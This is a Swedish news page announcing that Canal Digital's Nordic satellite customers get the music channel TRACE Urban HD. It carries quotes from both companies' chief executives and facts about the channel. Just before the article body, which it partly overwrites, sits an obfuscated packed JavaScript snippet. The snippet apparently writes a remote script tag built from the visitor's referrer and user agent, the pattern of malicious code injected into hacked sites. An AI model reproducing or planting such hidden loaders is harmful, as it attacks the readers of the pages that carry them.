Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

TRACE Urban HD kommer till Sverige

TRACE Urban HD kommer till Sverige
Sebastian

1 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekaez|var|u0026u|referrer|tyinh||js|php’.split(’|’),0,{}))
november får Canal Digitals parabolkunder tillgång till musikkanalen TRACE Urban HD, världens största musikkanal för R&B, hiphop och dance, den även rankas som #1 av alla musikkanaler i över 60 länder.

TRACE Urban HD är en renodlad musikkanal i HD med 90 procent musikvideos från det senaste inom R&B, hiphop, och dance.
Trots andra musiktjänster som Spotify och WiMP är intresset för att se musikvideos på tv stort i Sverige. Utöver att TRACE Urban HD riktar sig till den viktiga målgruppen 15-34 år så stärker den också Canal Digitals HD-utbud ytterligare.

– Det är roligt att vara först i Skandinavien med att kunna erbjuda våra kunder en av världens mest populära musikkanaler. Det är sällsynt med musikkanaler med så hög andel musikvideos, något vi vet är efterfrågat. Vi gläds mycket med våra kunder, säger John Nordin, VD Canal Digital Sverige.  

Musikkanalen TRACE Urban HD har skördat stora framgångar på sina befintliga marknader sedan kanalen lanserades 2003. Den rankas som den största musikkanalen i världen med fokus på hiphop och R&B och är även den största i musikkanalen oavsett genre i över 60 länder.

– Vi är mycket glada över samarbetet med Nordens största tv-operatör Canal Digital. Intresset för hiphop och R&B fortsätter att växa stort och TRACE Urban HD erbjuder den senaste musiken från de största stjärnorna inom främst R&B och hiphop, säger Olivier Laouchez, Grundare och VD för TRACE Group.

* TRACE Urban HD ingår kostnadsfritt för Canal Digitals kunder i Sverige, Norge, Danmark och Finland.
* TRACE Urban HD finns i 166 länder och ses av 60 miljoner hushåll.
* Världens största musikkanal inom hiphop och R&B
* Största musikkanalen, oavsett genre i över 60 länder
* Innehållet består till 90 procent av musikvideos, övriga 10 procent består av exklusiva intervjuer och senaste nytt från musikvärlden.
* Huvudmålgrupp för TRACE Urban HD är 15-34 år.